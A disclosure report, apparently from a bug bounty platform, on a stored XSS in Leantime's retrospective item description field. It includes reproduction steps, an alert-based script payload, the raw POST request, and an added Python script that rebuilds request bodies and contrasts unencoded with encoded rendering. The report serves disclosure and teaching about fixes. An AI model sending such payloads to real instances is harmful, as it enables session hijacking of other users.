Cross-site Scripting (XSS) - Stored in leantime/leantime

Status: Valid

Reported on: Nov 24th 2021


Description

I found a stored XSS in the description of a retrospective item. The value submitted in the description parameter of POST /retrospectives/retroDialog/ is stored and later rendered without output encoding, so a low-privileged Team Member can plant a script that executes when an administrator views the Retrospectives board.

Proof of Concept

Steps

1. Build the environment with Docker and create an administrator user.

2. Create a new "To-Do" from "Project Dashboard" in the left menu. (/)

3. From "User Management" in the menu on the right, create an account with the "Team Member" role and assign it to the project created in step 2. (/users/newUser/)

4. In a separate private (incognito) window, log in as the Team Member user created in step 3, so that the administrator and member sessions both stay active.

5. Select "Retrospectives" from the left menu and click "Add More". (/retrospectives/showBoards)

6. Enter the following payload in "Description" and save it:

"/></script><script>alert(3)</script>

The leading "/> closes whatever attribute and tag the value is placed in, and the </script> terminates any enclosing script element, so the injected <script> runs regardless of which of those contexts the stored description is rendered into. Saving the item sends this request (the data parameter carries a second copy of the payload, with alert(10)):

POST /retrospectives/retroDialog/ HTTP/1.1
Host: localhost
 ...
canvasId=&box=well&itemId=&description=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert(3)%3C%2Fscript%3E%0D%0A&data=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert(10)%3C%2Fscript%3E%0D%0A&milestoneId=&changeItem=1

7. Finally, open "Retrospectives" as the administrator user: the stored script executes and an alert dialog is shown.

This confirms that a script stored by an ordinary Team Member user executes in the administrator's browser, i.e. a stored XSS that crosses from a low-privileged account to a privileged one.
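The following Python script is an added example written for this page; it is not code from the report or from the Leantime project. It decodes the captured request body to recover the payload, rebuilds an equivalent body for resubmitting the request, and contrasts a constructed stand-in template that interpolates the stored description without encoding against the same template with context-aware encoding. The two render_* templates and the script-tag count are illustrative assumptions; Leantime's real templates and the fix in commit 7cbdbf are not shown on this page.

```python
"""Offline walk-through of the retrospective-item stored XSS.

Added example for this page.  The render_* functions below are constructed
stand-ins for a server-side template and are NOT Leantime's code.
"""
import html
import json
from urllib.parse import parse_qs, urlencode

# Payload from the report.  The leading "/> closes an attribute and its tag;
# the </script> terminates any enclosing script element, so the injected
# <script> runs whether the value lands in an attribute or inside a script.
PAYLOAD = '"/></script><script>alert(3)</script>'

# Request body captured in the report (POST /retrospectives/retroDialog/).
REPORT_BODY = (
    "canvasId=&box=well&itemId=&description=%22%2F%3E%3C%2Fscript%3E%3Cscript%3E"
    "alert(3)%3C%2Fscript%3E%0D%0A&data=%22%2F%3E%3C%2Fscript%3E%3Cscript%3E"
    "alert(10)%3C%2Fscript%3E%0D%0A&milestoneId=&changeItem=1"
)


def decode_report_body(body: str = REPORT_BODY) -> dict:
    """Decode the urlencoded form body into single-valued fields."""
    fields = parse_qs(body, keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()}


def build_body(description: str, data: str = "") -> str:
    """Build an equivalent body for re-sending the request with a new payload.
    Field names are those seen in the captured request."""
    return urlencode({
        "canvasId": "", "box": "well", "itemId": "",
        "description": description, "data": data,
        "milestoneId": "", "changeItem": "1",
    })


def render_vulnerable(description: str) -> str:
    """Constructed stand-in (assumption, not Leantime's template) that
    interpolates the stored value into an attribute and a script block
    with no encoding at all."""
    return (
        f'<div class="retro-item" title="{description}">\n'
        f'<script>var item = {{"description": "{description}"}};</script>\n'
        "</div>"
    )


def render_fixed(description: str) -> str:
    """Same stand-in with context-aware output encoding: HTML-attribute
    escaping for the attribute, and JSON encoding with < and > escaped for
    the script block, so a stored </script> can never close the element."""
    attr = html.escape(description, quote=True)
    js = (json.dumps({"description": description})
          .replace("<", "\\u003c").replace(">", "\\u003e"))
    return (
        f'<div class="retro-item" title="{attr}">\n'
        f"<script>var item = {js};</script>\n"
        "</div>"
    )


def count_script_elements(markup: str) -> int:
    """Number of <script> start tags in rendered markup.  The stand-in
    template contributes exactly one, so anything above 1 came from the
    stored description."""
    return markup.lower().count("<script")


if __name__ == "__main__":
    decoded = decode_report_body()
    print("payload recovered:", decoded["description"].rstrip("\r\n") == PAYLOAD)
    print("--- unencoded template ---")
    print(render_vulnerable(PAYLOAD))
    print("--- context-aware encoding ---")
    print(render_fixed(PAYLOAD))
```

To reproduce against a live instance, send build_body(PAYLOAD) to /retrospectives/retroDialog/ with the Team Member's session cookie (step 6), then fetch the Retrospectives board as the administrator and compare count_script_elements on the response with a baseline fetched before the payload was stored; any extra <script> start tag means the description was rendered unencoded. The encoding in render_fixed is the general rule: escape for the exact context the value is written into, and never rely on attribute escaping alone when the same value is also emitted inside a script element.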

Summary

- Endpoint: POST /retrospectives/retroDialog/

- Parameter: description

- Test payload: "/></script><script>alert(3)</script>

Impact

An ordinary Team Member can plant JavaScript that runs in the browser of every user who views the Retrospectives board, including administrators. The script can read the victim's session cookie (unless the cookie is marked HttpOnly, in which case document.cookie does not expose it) and send it to an attacker-controlled host, which would give the attacker unauthorized access to the victim's account. Even with HttpOnly set, the script still executes with the victim's session and can issue authenticated requests to the application on their behalf.

Timeline

- We are processing your report and will contact the leantime team within 24 hours. (6 months ago)

- morioka12 modified the report. (6 months ago)

- We have contacted a member of the leantime team and are waiting to hear back. (6 months ago)

- We have sent a follow up to the leantime team. We will try again in 7 days. (6 months ago)

- We have sent a second follow up to the leantime team. We will try again in 10 days. (6 months ago)

- We have sent a third and final follow up to the leantime team. This report is now considered stale. (5 months ago)

- Marcel Folaron validated this vulnerability. (4 months ago)

- morioka12 has been awarded the disclosure bounty.

- The fix bounty is now up for grabs.

- Marcel Folaron confirmed that a fix has been merged on 7cbdbf. (a month ago)

- Marcel Folaron has been awarded the fix bounty.